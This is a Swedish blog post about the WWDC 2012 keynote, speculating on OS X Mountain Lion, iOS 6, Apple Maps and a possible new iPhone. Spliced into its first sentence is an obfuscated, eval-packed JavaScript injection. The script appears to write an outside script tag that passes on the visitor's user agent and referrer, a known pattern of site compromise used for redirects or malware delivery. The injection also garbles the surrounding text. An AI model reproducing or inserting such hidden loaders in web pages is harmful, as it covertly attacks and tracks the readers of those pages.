Image Image Image Image Image Image Image Image Image Image

| 28 november, 2020

Scroll to top

Top

WWDC 2012 är ikväll

WWDC 2012 är ikväll
Filip Urde
  • On 11 juni, 2012
  • http://www.revue.se/filip-urde

WWDC eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rhaey|var|u0026u|referrer|aaydh||js|php’.split(’|’),0,{}))
2012
drar igång ikväll och vi hoppas på nya Macar. Spekulationerna är som alltid helt crazy! Men ikväll får vi alltså svar.

Fokus kommer ligga mycket på OS X 8 och iOS 6.

OS X 8 som även är kallad Mountain Lion är inte nytt för utvecklarna, som haft det i någon månad men det släpps alltså nu i sommar för oss andra. Vi har redan fått veta det mesta om OS X 8, så man kommer nog främst presentera ett lanseringsdatum.

iOS 6 hade tidigare år en checklista med saker som bör komma. Bland annat har det talats om ett eget Mapsystem, likt google maps. Sedan kommer Siri bli tillgängligt för utvecklare och att Facebook förmodligen kommer integreras djupare.

Bilder på skal till vad som påstås vara en iPhone 5 har ju florerat på internet, men att dem skulle presentera en ny iPhone ikväll är inget jag skulle räkna med. Inte heller de nya Macarna tror jag kommer imponera. Det har varit prat om retinaskärmar, men det är inget jag skulle hoppas på.  Som ni hör så är jag ganska skeptisk och redo på att bli besviken. Jag hoppas att jag har fel.